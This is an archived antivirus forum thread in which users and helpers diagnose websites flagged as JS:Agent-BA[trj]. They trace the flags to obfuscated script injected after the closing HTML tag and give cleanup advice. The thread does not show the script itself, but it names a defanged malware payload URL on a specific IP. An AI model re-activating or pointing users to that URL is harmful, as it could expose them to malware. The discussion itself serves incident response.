Site generating JS:Agent-BA[Trj]

Viruses and worms
1

A website that has been fine for ages started generating a JS:Agent-BA[trj] error today. If one goes directly to a page within the site, no error is shown. The main page seems to generate this error for those of us running Avast and at least one person running AVG.

Anyone know what causes this? The webmaster is saying it looks like Avast is not reading the javascript menu correctly, but this has never happened previously.

2

Are you saying that both avast! and AVG detect the page? I’d say it’s quite likely that the site was hacked and indeed contains something malicious.
What’s the address of the website?

3

Hi Mystii,

For the moment you can try to go to the page using Firefox with the NoScript add-on installed = enabled.
In that case avast won’t alert. What is the site’s name, make the link cannot be clicked, like:
hxxp://ad.nl for instance,

polonus

4

Someone just reported that McAfee got the same error. The site is a commercial one: hxxp://www.cilm.com (obviously, change the xx)

5

Pretty much unanimous then, link scanner doesn’t like it either.

6

Hi Mystii,

Also scandoo.com link checking search engine alerts here:

Scanning Results: Security & Content Safety
  • Use Caution.

This site may represent a potential web risk.
Some users may consider this unwanted.


What more do you want to know?

polonus

7

Dr. Web failed to detect anything on that page… Dr. Web is becoming not reliable…

8

Apparently the hosting site is dealing with the problem - now that they have acknowledged it as a problem. That’s really what I wanted - to know that yes, it was a problem and not just a false positive.

Thanks for the attention to the post!

9

You’re welcome. Thanks for posting and feel free to come back any time you need help or just to change experiences 8)

10

Yes, the old obfuscated (defeats DrWeb yet again) script tag 16 lines outside of the closing HTML tag on one enormous single line I have broken it up for ease and stripped out the blank lines.

11

Please help, when opening hxxp://www.guatemalaweb.com the browser try to open
this page and frezzes the browser, hXXp://116.50.15.25/stats/getfile.php?f=vispdf AVAST reported the JS:Agent-BA[trj] and I have removed the long script code after the html closing, but still
Thanks

12

Well the second IP address you also need to modify as you did for the first as that is likely to be where the malware payload is. However, the IP is for myrdns.com (HostFresh Internet) and is in Hong Kong.

DrWeb link checker also finds malware at the second link.

The guatemalaweb.com site opens now with no alert, so the chunk of script you removed appears to have done the trick.

However, I assume that you didn’t place the script after the closing HTML tag, then the page appears to have been hacked, so you might want to do checks for a similar issue on other pages. You might also want to change any site passwords and tals to the Host about how to combat this script injection.

13

The problem is that hxxp://www.cybershouts.com techs do not believe me, they claim everything is OK, as the second IP, im not clear about what you mean, I am not very technical I will really will appreciate more details please. And I have never added the script at all, I deleted it once and is also in other pages like hxxp://www.guatemalaweb.com/index.html wich I will erase as soon I change passwords, how do you think this guy is hacking so many webs at almost the same time? Thanks a lot

14

Ola guateweb,

Well we had that lately with a Dutch site, then the man showed the threat to those that host the website or the webmaster himself, and they cleansed it and also changed all the log passwords so new or similar malware could not be installed anew. So if they do not seem to believe you, you can direct them to this site and confronted with what they see here, I think they can no longer ignore it, but some are in denial or just ignorant. Anyway you should be thanked for reporting this and also for protecting others that may go there. Surf safe and secure, and welcome to our forums,

Con Dios,

polonus

15

Who are cybershouts.com, you didn’t mention them in your first post ?
I can only assume that they are your web hosts.

The problem being that since you have stripped out the code after the closing html tag the evidence has gone, so when you web hosts checks it might find nothing. Taking a screen shot before removing the script would have given you some evidence.

By modifying the second IP I mean doing this hXXp://116.50.15.25/stats/getfile.php?f=vispdf changing the http to hXXp so the link isn’t active exposing forum members to accidental exposure…

So I have visited the hxxp://www.guatemalaweb.com/index.html and gained some evidence in the form of images for you (right click on the image and select ‘save image as’ or words to that effect. I broke up the single line of the script tag to make it easier to see in the image.

Tell then that at the bottom of that page is a malicious script that you didn’t place there.

16

Many thanks again for the good lesson, I have done wht it takes to survive another day in the web coded sea and you really have help me, I just hope my hosting guys learn a bit from you guys too. Thay have being told. Sorry about the 2nd I.P. will never happend again. Best regards. Rene

17

You’re welcome.

Don’t worry about the IP it is just so you know should you need to post again.

A belated welcome to the forums.

18

Hi,
I’m glad I found your forum. I hope this is not considered thread hijacking but I have the exact same problem. My site (hxxp://www.tribeazure.com) does not do this each time I go to it but it does it regularly. I have called my hosting company twice only to be told there is nothing they can do. They want a screenshot but the challenge there is once this particular 116.50.15.25…file is trying to open the computer completely freezes. I see one characteristic of this parasite is it sucks all of the virtual memory. It’s hard to take a screenshot when I am forced to shut the system off. I’m frustrated.
I do not find a long string of script on either of the pages this has happened to me but if I do I won’t take it out before taking the shot. I also referred the tech girl to this page to review this topic here so I tried that too.

Does this happen because the host has been compromised or is it my computer is infected and passes it to them? GRRR.

Thank you all in advance for any help you have to offer. I’m not so lucky guateweb with his host.

Nicci

19

For a Hosting company to say there is nothing that they can do about it speaks volumes about there technical ability (or the lack of it that they can’t protect their servers and customers) nd I would be looking elsewhere.

That IP you gave is:

Checking IP: 116.50.15.25... Name: 116-50-15-25.myrdns.com IP: 116.50.15.25 Domain: myrdns.com

http://www.robtex.com/dns/myrdns.com.html

dns information about myrdns.com. ... myrdns.com is a domain controlled by two nameservers at hostfresh.com. They are on the same IP network. ...

Is HostFresh.com is your Hosting source ?

I visited your site and no alerts, so nothing there at the home page at this time. If you get it in the future you will have to check the page source code and you will be looking for either a or

20

THank you very much, David. My host is Godaddy. I am none to impressed with their tech department if that’s what we want to call it. The worst part of all is they will not send the issue onto the REAL techies. I did find a way to get rid of it at least until it infects the server at godaddy again. I republished the clean file again and that seemed to get rid of it. I have noticed it only affects the index pages of a site. It also seems to be a new problem because when searching this there was very little info and only recent info.

Thanks again!! Nicci